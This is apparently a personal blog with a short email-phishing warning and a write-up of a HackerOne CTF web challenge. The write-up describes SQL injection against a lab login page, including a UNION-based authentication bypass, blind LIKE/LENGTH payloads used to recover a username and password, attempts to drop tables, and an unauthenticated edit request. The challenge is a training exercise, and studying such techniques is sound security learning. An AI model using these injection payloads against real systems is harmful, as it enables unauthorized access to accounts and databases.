?

Log in

No account? Create an account

April 19th, 2019

01:58 pm
Online Scams 101

Just got an email, probably legit, from Navy Federal, whom I have an account with.



Ok, given it is probably legit, you could click the link and find out... but one of the best ways to stay safe online, is.. DO NOT CLICK ON LINKS. OMG. Don't click links.

You have no idea where the link goes and what sort of malware exists at the other end.

03:10 pm
HackerOne CTF Micro CMS v2

Ok.. next challenge... they sort of took the previous one where you could create pages and edit them and wrapped it in a login screen so you have to log in to access them.

So... Fuck around with user name and password. After entering a funky character we find an error message :
Traceback (most recent call last):
  File "./main.py", line 145, in do_login
    if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 250, in execute
    self.errorhandler(self, exc, value)
  File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
    raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1")

Ok.. nice so... we see we have an admins database with username and password fields.

The basic idea is to use '; to end the previous statement, put in our own sql statement and then end with a comment character to get rid of the rest of the line.   That or we use ' and then additional text to modify the existing statement, but still terminate with comment to get rid of the unused part of the statement.   The base statement is grabbing the password from the table for the provided username.

I went way down the wrong way here... until I got a hint.   I found that I could drop the table and I tried to insert into the table and so forth.   None of that seemed to work.   I even tried to create other tables, to drop the original table and create a new one with known creds.... either I messed it up or there were protections to keep this from happening.   The hint was about union... so I went that route.

So... if we build a statement that returns some hardcoded text and then provide that same text as password, we will get logged in.    Used UNION to return 'foo' and boom.   First flag.   Also on that page is a hint to get 'the real login creds' ... crumb trail to the next flag?

While thinking about that... I played around and found I could post to page/edit/1 before I was logged in and got the next flag.   Also got a funky bit of base64 gunk as a session key... part of which decoded to json, {"admin" : "true"}     That might come in handy... Maybe I didn't need to log in and I just needed to set a session header like that?

Anyway... playing around with sql in the above statement...

SELECT password FROM admins WHERE username='' or password like "a%"# seems to return unknown user.. .but when I did it where it was LIKE "n%", that return invalid password.   So.. it seems I can figure out the password.   I played around with the %a, a%, and %a% type of combinations along with ' or LENGTH(password) = 4; statements and discovered that for me, the length was 6, it started with an n and ended with an e and contained e,i, k, l , n, o

Sweet, no duplicates... guessed, "nikole" and got it.    Now do the same for the username and found it had a, e, i, n, and r.   It started with i and ended with a and had 5 letters... so... "irena"?    Boom.  Logged in and got the flag.